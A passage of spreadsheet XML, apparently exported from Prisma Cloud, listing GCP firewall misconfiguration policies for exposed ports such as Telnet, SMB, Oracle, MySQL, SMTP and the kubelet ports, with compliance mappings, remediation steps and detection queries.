          <t>This policy identifies GCP Firewall rules which allow all inbound traffic on Telnet port (23). Allowing access from arbitrary IP addresses to this port increases the attack surface of your network. It is recommended that the Telnet port (23) should be allowed to specific IP addresses.</t>
        </is>
      </c>
      <c r="X2710"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10" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'compute.firewalls.update' and 'compute.networks.updatePolicy' permission. Successful execution will disable this firewall rule blocking internet traffic to Telnet port (23).",
'impact': 'Disable GCP Firewall rule which allows all traffic on Telnet port (23)',
'cliScriptTemplate': 'gcloud compute --project=$account firewall-rules update $resourceName --disabled'</t>
        </is>
      </c>
      <c r="Z2710"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_Port.inRange(23,23) or (ports does not exist and (IPProtocol contains tcp or IPProtocol contains udp)))] exists</t>
        </is>
      </c>
      <c r="AA2710" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2710" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2710" t="inlineStr">
        <is>
          <t>PC-GCP-VPC-65</t>
        </is>
      </c>
      <c r="AD2710" t="b">
        <v>1</v>
      </c>
      <c r="AE2710" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2710" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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0" t="inlineStr">
        <is>
          <t>024045e3-dfa3-4109-9d68-e7fcf3c6c4d1</t>
        </is>
      </c>
      <c r="AI2710" t="inlineStr">
        <is>
          <t>024045e3-dfa3-4109-9d68-e7fcf3c6c4d1</t>
        </is>
      </c>
      <c r="AJ2710" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2710" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2711">
      <c r="A2711"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PCI DSS v4.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, NIST SP 800-171 Revision 2, NIST CSF v2.0, NIST 800-53 Rev4, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v7.1, NIST 800-53 Rev 5, PCI DSS v3.2.1, Telecommunications Security Act - TSA, CSA CCM v.4.0.6, CIS Controls v7.1, SOC 2, ISO 27001:2013, NIST SP 800-172, TX-RAMP Level 1, Insurance Regulatory And Development Authority Of India, Sarbanes Oxley Act (SOX), ISO 27002:2022, MPAA Content Protection Best Practices, NIST CSF, CDC NIST 800-53 Rev4, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2, HITRUST CSF v.11.2.0, Risk Management in Technology (RMiT),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PCI DSS v4.0, HITRUST CSF v9.3 [Deprecated]</t>
        </is>
      </c>
      <c r="B2711" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2711" s="2" t="inlineStr"/>
      <c r="D2711" t="inlineStr"/>
      <c r="E2711" t="inlineStr"/>
      <c r="F2711" t="inlineStr"/>
      <c r="G2711" t="b">
        <v>1</v>
      </c>
      <c r="H27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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2711" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall</t>
        </is>
      </c>
      <c r="K2711" t="inlineStr">
        <is>
          <t>GCP Firewall rule allows all traffic on Oracle DB port (1521)</t>
        </is>
      </c>
      <c r="L2711" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2711" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2711" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2711" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2711" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2711" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2711" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2711" t="inlineStr">
        <is>
          <t>GCP</t>
        </is>
      </c>
      <c r="T2711" t="b">
        <v>1</v>
      </c>
      <c r="U2711" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2711" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall-rules-list</t>
        </is>
      </c>
      <c r="W2711" t="inlineStr">
        <is>
          <t>This policy identifies GCP Firewall rules which allow all inbound traffic on DB port (1521). Allowing access from arbitrary IP addresses to this port increases the attack surface of your network. It is recommended that the DB port (1521) should be allowed to specific IP addresses.</t>
        </is>
      </c>
      <c r="X2711"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11" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'compute.firewalls.update' and 'compute.networks.updatePolicy' permission. Successful execution will disable this firewall rule blocking internet traffic to Oracle DB port (1521).",
'impact': 'Disable GCP Firewall rule which allows all traffic on Oracle DB port (1521)',
'cliScriptTemplate': 'gcloud compute --project=$account firewall-rules update $resourceName --disabled'</t>
        </is>
      </c>
      <c r="Z2711"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_Port.inRange(1521,1521) or (ports does not exist and (IPProtocol contains tcp or IPProtocol contains udp)))] exists</t>
        </is>
      </c>
      <c r="AA2711" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2711" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2711" t="inlineStr">
        <is>
          <t>PC-GCP-VPC-76</t>
        </is>
      </c>
      <c r="AD2711" t="b">
        <v>1</v>
      </c>
      <c r="AE2711" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2711" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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1" t="inlineStr">
        <is>
          <t>39f48b70-3f22-481d-be71-13211bc87d98</t>
        </is>
      </c>
      <c r="AI2711" t="inlineStr">
        <is>
          <t>39f48b70-3f22-481d-be71-13211bc87d98</t>
        </is>
      </c>
      <c r="AJ2711" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2711" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2712">
      <c r="A2712"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PCI DSS v4.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, NIST SP 800-171 Revision 2, NIST CSF v2.0, NIST 800-53 Rev4, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v7.1, NIST 800-53 Rev 5, PCI DSS v3.2.1, Telecommunications Security Act - TSA, CIS Controls v7.1, SOC 2, ISO 27001:2013, NIST SP 800-172, TX-RAMP Level 1, Insurance Regulatory And Development Authority Of India, Sarbanes Oxley Act (SOX), MPAA Content Protection Best Practices, NIST CSF, CDC NIST 800-53 Rev4, Secure Controls Framework (SCF) - 2024.2, HITRUST CSF v.11.2.0,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PCI DSS v4.0, HITRUST CSF v9.3 [Deprecated]</t>
        </is>
      </c>
      <c r="B2712" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2712" s="2" t="inlineStr"/>
      <c r="D2712" t="inlineStr"/>
      <c r="E2712" t="inlineStr"/>
      <c r="F2712" t="inlineStr"/>
      <c r="G2712" t="b">
        <v>1</v>
      </c>
      <c r="H27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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2712" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall</t>
        </is>
      </c>
      <c r="K2712" t="inlineStr">
        <is>
          <t>GCP Firewall rule allows all traffic on Microsoft-DS port (445)</t>
        </is>
      </c>
      <c r="L2712" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2712" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2712" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2712" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2712" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2712" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2712" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2712" t="inlineStr">
        <is>
          <t>GCP</t>
        </is>
      </c>
      <c r="T2712" t="b">
        <v>1</v>
      </c>
      <c r="U2712" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2712" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall-rules-list</t>
        </is>
      </c>
      <c r="W2712" t="inlineStr">
        <is>
          <t>This policy identifies GCP Firewall rules which allow all inbound traffic on Microsoft-DS port (445). Allowing access from arbitrary IP addresses to this port increases the attack surface of your network. It is recommended that the Microsoft-DS port (445) should be allowed to specific IP addresses.</t>
        </is>
      </c>
      <c r="X2712"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12" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'compute.firewalls.update' and 'compute.networks.updatePolicy' permission. Successful execution will disable this firewall rule blocking internet traffic to Microsoft-DS port (445).",
'impact': 'Disable GCP Firewall rule which allows all traffic on Microsoft-DS port (445)',
'cliScriptTemplate': 'gcloud compute --project=$account firewall-rules update $resourceName --disabled'</t>
        </is>
      </c>
      <c r="Z2712"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_Port.inRange(445,445) or (ports does not exist and (IPProtocol contains tcp or IPProtocol contains udp)))] exists</t>
        </is>
      </c>
      <c r="AA2712" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2712" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2712" t="inlineStr">
        <is>
          <t>PC-GCP-VPC-73</t>
        </is>
      </c>
      <c r="AD2712" t="b">
        <v>1</v>
      </c>
      <c r="AE2712" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2712" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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2" t="inlineStr">
        <is>
          <t>1aa8f0f0-139f-49a2-9c9d-41c71a3c806f</t>
        </is>
      </c>
      <c r="AI2712" t="inlineStr">
        <is>
          <t>1aa8f0f0-139f-49a2-9c9d-41c71a3c806f</t>
        </is>
      </c>
      <c r="AJ2712" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2712" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2713">
      <c r="A2713" t="inlineStr">
        <is>
          <t>HIPAA, New Zealand Information Security Manual (NZISM v3.4), CIS Controls v8.1, NIST CSF v2.0, NIST 800-53 Rev 5, Telecommunications Security Act - TSA, SOC 2, TX-RAMP Level 1, Insurance Regulatory And Development Authority Of India, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, HITRUST CSF v.11.2.0, Secure Controls Framework (SCF) - 2024.2, Microsoft Cloud Security Benchmark v1, Telecommunications Security Act - TSA, ISO/IEC 27001:2022, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Secure Controls Framework (SCF) - 2022.2.1, ITSG-33, Copy of New Zealand Information Security Manual (NZISM v3.4), CRI Profile v2.0, GDPR, SOC 2, Secure Controls Framework (SCF) - 2022.2.1, TX-RAMP Level 2</t>
        </is>
      </c>
      <c r="B2713" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2713" s="2" t="inlineStr"/>
      <c r="D2713" t="inlineStr"/>
      <c r="E2713" t="inlineStr"/>
      <c r="F2713" t="inlineStr"/>
      <c r="G2713" t="b">
        <v>1</v>
      </c>
      <c r="H27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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2713" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall</t>
        </is>
      </c>
      <c r="K2713" t="inlineStr">
        <is>
          <t>GCP Firewall rule exposes GKE clusters by allowing all traffic on port 10250</t>
        </is>
      </c>
      <c r="L2713" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2713" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2713" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2713" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2713" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2713" t="inlineStr">
        <is>
          <t>19</t>
        </is>
      </c>
      <c r="R2713" t="inlineStr">
        <is>
          <t>19.1</t>
        </is>
      </c>
      <c r="S2713" t="inlineStr"/>
      <c r="T2713" t="b">
        <v>1</v>
      </c>
      <c r="U2713" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2713" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall-rules-list</t>
        </is>
      </c>
      <c r="W2713" t="inlineStr">
        <is>
          <t>This policy identifies GCP Firewall rule allowing all traffic on port 10250 which allows GKE full node access. The port 10250 on the kubelet is used by the kube-apiserver (running on hosts labelled as Orchestration Plane) for exec and logs. As per security best practice, port 10250 should not be exposed to the public.</t>
        </is>
      </c>
      <c r="X2713" t="inlineStr">
        <is>
          <t>As port 10250 exposes sensitive information of GKE pod configuration it is recommended to disable this firewall rule. 
Otherwise, remove the overly permissive source IPs following the below steps,
1. Login to GCP Console
2. Navigate to 'VPC Network'(Left Panel)
3. Go to the 'Firewall' section (Left Panel)
4. Click on the reported Firewall rule
5. Click on 'EDIT'
6. Modify Source IP ranges to specific IP
7. Click on 'SAVE'.</t>
        </is>
      </c>
      <c r="Y2713" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'compute.firewalls.update' and 'compute.networks.updatePolicy' permission. Successful execution will disable this firewall rule blocking internet traffic to port 10250.",
'impact': 'disable GCP Firewall rule that allows all traffic on port 10250',
'cliScriptTemplate': 'gcloud compute --project=$account firewall-rules update $resourceName --disabled'</t>
        </is>
      </c>
      <c r="Z2713"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_Port.inRange(10250,10250) or (ports does not exist and (IPProtocol contains tcp or IPProtocol contains udp or IPProtocol contains "all")))] exists as X; config from cloud.resource where api.name = 'gcloud-container-describe-clusters' AND json.rule = status equals RUNNING as Y; filter '$.X.network contains $.Y.networkConfig.network' ; show X;</t>
        </is>
      </c>
      <c r="AA2713" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2713" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2713" t="inlineStr">
        <is>
          <t>PC-GCP-VPC-869</t>
        </is>
      </c>
      <c r="AD2713" t="b">
        <v>1</v>
      </c>
      <c r="AE2713" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2713" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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3" t="inlineStr">
        <is>
          <t>0e7ccc72-94cf-4bd4-b736-0fc95c74cbf2</t>
        </is>
      </c>
      <c r="AI2713" t="inlineStr">
        <is>
          <t>c88e6b00-3e5f-4073-a091-e9be8747cf20</t>
        </is>
      </c>
      <c r="AJ2713" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2713" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2714">
      <c r="A2714" t="inlineStr">
        <is>
          <t>Copy of ACSC Information Security Manual (ISM)-clone, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), kashan ACSC Information Security Manual (ISM), HIPAA, ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), New Zealand Information Security Manual (NZISM v3.4), kfirdaus AWS Account-CS, ISO/IEC 27001:2022, kfirdaus AWS Account-CS, PCI DSS v4.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, NIST CSF v2.0, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2024.2, CIS Controls v7.1, NIST 800-53 Rev 5, Telecommunications Security Act - TSA, Telecommunications Security Act - TSA, CIS Controls v7.1, SOC 2, TX-RAMP Level 1, Insurance Regulatory And Development Authority Of India, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, HITRUST CSF v.11.2.0, Risk Management in Technology (RMiT), kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, Microsoft Cloud Security Benchmark v1, Telecommunications Security Act - TSA, ISO/IEC 27001:2022, PCI DSS v4.0, SOC 2, kashan ACSC Information Security Manual (ISM), SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), PCI DSS v4.0, Secure Controls Framework (SCF) - 2022.2.1, CIS Controls v8, Copy of CIS Controls v8, ITSG-33, Copy of New Zealand Information Security Manual (NZISM v3.4), CRI Profile v2.0, RBI Baseline Cyber Security and Resilience Requirements, GDPR, SOC 2, FFIEC, Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), kashan ACSC Information Security Manual (ISM), Copy of ACSC Information Security Manual (ISM)-clone, TX-RAMP Level 2, ISO/IEC 27001:2022, HIPAA, HIPAA, PCI DSS v4.0</t>
        </is>
      </c>
      <c r="B2714" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2714" s="2" t="inlineStr"/>
      <c r="D2714" t="inlineStr"/>
      <c r="E2714" t="inlineStr"/>
      <c r="F2714" t="inlineStr"/>
      <c r="G2714" t="b">
        <v>1</v>
      </c>
      <c r="H27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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2714" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall</t>
        </is>
      </c>
      <c r="K2714" t="inlineStr">
        <is>
          <t>GCP Firewall rule exposes GKE clusters by allowing all traffic on read-only port (10255)</t>
        </is>
      </c>
      <c r="L2714" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2714" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2714" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2714" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2714" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2714" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2714" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2714" t="inlineStr"/>
      <c r="T2714" t="b">
        <v>1</v>
      </c>
      <c r="U2714" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2714" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall-rules-list</t>
        </is>
      </c>
      <c r="W2714" t="inlineStr">
        <is>
          <t>This policy identifies GCP Firewall rule allowing all traffic on read-only port (10255) which exposes GKE clusters. In GKE, Kubelet exposes a read-only port 10255 which shows the configurations of all pods on the cluster at the /pods API endpoint. GKE itself does not expose this port to the Internet as the default project firewall configuration blocks external access. However, it is possible to inadvertently expose this port publicly on GKE clusters by creating a Google Compute Engine VPC firewall for GKE nodes that allows traffic from all source ranges on all the ports. This configuration publicly exposes all pod configurations, which might contain sensitive information.</t>
        </is>
      </c>
      <c r="X2714" t="inlineStr">
        <is>
          <t>As port 10255 exposes sensitive information of GKE pod configuration it is recommended to disable this firewall rule. 
Otherwise, remove the overly permissive source IPs following below steps,
1. Login to GCP Console
2. Navigate to 'VPC Network'(Left Panel)
3. Go to the 'Firewall' section (Left Panel)
4. Click on the reported Firewall rule
5. Click on 'EDIT'
6. Modify Source IP ranges to specific IP
7. Click on 'SAVE'.</t>
        </is>
      </c>
      <c r="Y2714" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'compute.firewalls.update' and 'compute.networks.updatePolicy' permission. Successful execution will disable this firewall rule blocking internet traffic to port 10255.",
'impact': 'Disable GCP Firewall rule which allows all traffic on read-only port (10255)',
'cliScriptTemplate': 'gcloud compute --project=$account firewall-rules update $resourceName --disabled'</t>
        </is>
      </c>
      <c r="Z2714"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_Port.inRange(10255,10255) or (ports does not exist and (IPProtocol contains tcp or IPProtocol contains udp or IPProtocol contains "all")))] exists as X; config from cloud.resource where api.name = 'gcloud-container-describe-clusters' AND json.rule = status equals RUNNING as Y; filter '$.X.network contains $.Y.networkConfig.network' ; show X;</t>
        </is>
      </c>
      <c r="AA2714" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2714" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2714" t="inlineStr">
        <is>
          <t>PC-GCP-VPC-863</t>
        </is>
      </c>
      <c r="AD2714" t="b">
        <v>1</v>
      </c>
      <c r="AE2714" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2714" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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4" t="inlineStr">
        <is>
          <t>5b9d4c4b-c9ee-41e6-af95-e66434d3d8d7</t>
        </is>
      </c>
      <c r="AI2714" t="inlineStr">
        <is>
          <t>8a28c396-0a6f-4958-84e2-9c74c5911ae5</t>
        </is>
      </c>
      <c r="AJ2714" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2714" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2715">
      <c r="A2715"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PCI DSS v4.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, NIST SP 800-171 Revision 2, NIST CSF v2.0, NIST 800-53 Rev4, TX-RAMP Level 1, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v7.1, NIST 800-53 Rev 5, PCI DSS v3.2.1, Telecommunications Security Act - TSA, CSA CCM v.4.0.6, CIS Controls v7.1, SOC 2, ISO 27001:2013, NIST SP 800-172, TX-RAMP Level 1, Insurance Regulatory And Development Authority Of India, Sarbanes Oxley Act (SOX), ISO 27002:2022, MPAA Content Protection Best Practices, NIST CSF, CDC NIST 800-53 Rev4, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2, HITRUST CSF v.11.2.0, Risk Management in Technology (RMiT),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RBI Baseline Cyber Security and Resilience Requirements, GDPR, SOC 2, FFIEC, TX-RAMP Level 2,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PCI DSS v4.0, HITRUST CSF v9.3 [Deprecated]</t>
        </is>
      </c>
      <c r="B2715" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2715" s="2" t="inlineStr"/>
      <c r="D2715" t="inlineStr"/>
      <c r="E2715" t="inlineStr"/>
      <c r="F2715" t="inlineStr"/>
      <c r="G2715" t="b">
        <v>1</v>
      </c>
      <c r="H27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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2715" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall</t>
        </is>
      </c>
      <c r="K2715" t="inlineStr">
        <is>
          <t>GCP Firewall rule allows all traffic on SMTP port (25)</t>
        </is>
      </c>
      <c r="L2715" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2715" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2715" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2715" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2715" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2715" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2715" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2715" t="inlineStr">
        <is>
          <t>GCP</t>
        </is>
      </c>
      <c r="T2715" t="b">
        <v>1</v>
      </c>
      <c r="U2715" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2715" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall-rules-list</t>
        </is>
      </c>
      <c r="W2715" t="inlineStr">
        <is>
          <t>This policy identifies GCP Firewall rules which allow all inbound traffic on SMTP port (25). Allowing access from arbitrary IP addresses to this port increases the attack surface of your network. It is recommended that the SMTP port (25) should be allowed to specific IP addresses.</t>
        </is>
      </c>
      <c r="X2715"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15" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'compute.firewalls.update' and 'compute.networks.updatePolicy' permission. Successful execution will disable this firewall rule blocking internet traffic to SMTP port (25).",
'impact': 'Disable GCP Firewall rule which allows all traffic on SMTP port (25)',
'cliScriptTemplate': 'gcloud compute --project=$account firewall-rules update $resourceName --disabled'</t>
        </is>
      </c>
      <c r="Z2715"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_Port.inRange(25,25) or (ports does not exist and (IPProtocol contains tcp or IPProtocol contains udp)))] exists</t>
        </is>
      </c>
      <c r="AA2715" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2715" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2715" t="inlineStr">
        <is>
          <t>PC-GCP-VPC-71</t>
        </is>
      </c>
      <c r="AD2715" t="b">
        <v>1</v>
      </c>
      <c r="AE2715" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2715" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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5" t="inlineStr">
        <is>
          <t>e35ce679-e427-4e00-a9d2-44d808c694bd</t>
        </is>
      </c>
      <c r="AI2715" t="inlineStr">
        <is>
          <t>e35ce679-e427-4e00-a9d2-44d808c694bd</t>
        </is>
      </c>
      <c r="AJ2715" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2715" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2716">
      <c r="A2716" t="inlineStr">
        <is>
          <t>ISO 27001:2013, CSA CCM v3.0.1, Copy of ACSC Information Security Manual (ISM)-clone, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST 800-53 Rev4, kashan ACSC Information Security Manual (ISM), HIPAA, ACSC Information Security Manual (ISM), Insurance Regulatory And Development Authority Of India, ACSC Information Security Manual (ISM), New Zealand Information Security Manual (NZISM v3.4), kfirdaus AWS Account-CS, MITRE ATT&amp;CK v8.2 [Deprecated], CDC NIST 800-53 Rev4, NIST SP 800-171 Revision 3, GDPR, APRA (CPS 234) Information Security, kfirdaus AWS Account-CS, PCI DSS v4.0, CIS Controls v8.1, NIST SP 800-171 Revision 2, NIST CSF v2.0, NIST 800-53 Rev4, TX-RAMP Level 1, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v7.1, NIST 800-53 Rev 5, PCI DSS v3.2.1, Telecommunications Security Act - TSA, CSA CCM v.4.0.6, CIS Controls v7.1, SOC 2, ISO 27001:2013, NIST SP 800-172, TX-RAMP Level 1, Insurance Regulatory And Development Authority Of India, Sarbanes Oxley Act (SOX), ISO 27002:2022, MPAA Content Protection Best Practices, NIST CSF, CDC NIST 800-53 Rev4, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2, HITRUST CSF v.11.2.0,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CRI Profile v2.0, RBI Baseline Cyber Security and Resilience Requirements, GDPR, SOC 2, FFIEC, TX-RAMP Level 2, Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), CSA CCM v3.0.1, kashan ACSC Information Security Manual (ISM), CCPA 2018, PIPEDA, NIST CSF, Brazilian Data Protection Law (LGPD), Copy of ACSC Information Security Manual (ISM)-clone, TX-RAMP Level 2, CSA CCM v3.0.1, NIST SP 800-171 Revision 2, PCI DSS v4.0, HITRUST CSF v9.3 [Deprecated]</t>
        </is>
      </c>
      <c r="B2716" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2716" s="2" t="inlineStr"/>
      <c r="D2716" t="inlineStr"/>
      <c r="E2716" t="inlineStr"/>
      <c r="F2716" t="inlineStr"/>
      <c r="G2716" t="b">
        <v>1</v>
      </c>
      <c r="H27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kfirdaus-alert-rule-test,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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2716" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall</t>
        </is>
      </c>
      <c r="K2716" t="inlineStr">
        <is>
          <t>GCP Firewall rule allows all traffic on MySQL DB port (3306)</t>
        </is>
      </c>
      <c r="L2716" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2716" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2716" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2716" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2716" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2716" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2716" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2716" t="inlineStr">
        <is>
          <t>GCP,Policy Status Review</t>
        </is>
      </c>
      <c r="T2716" t="b">
        <v>1</v>
      </c>
      <c r="U2716" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2716" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall-rules-list</t>
        </is>
      </c>
      <c r="W2716" t="inlineStr">
        <is>
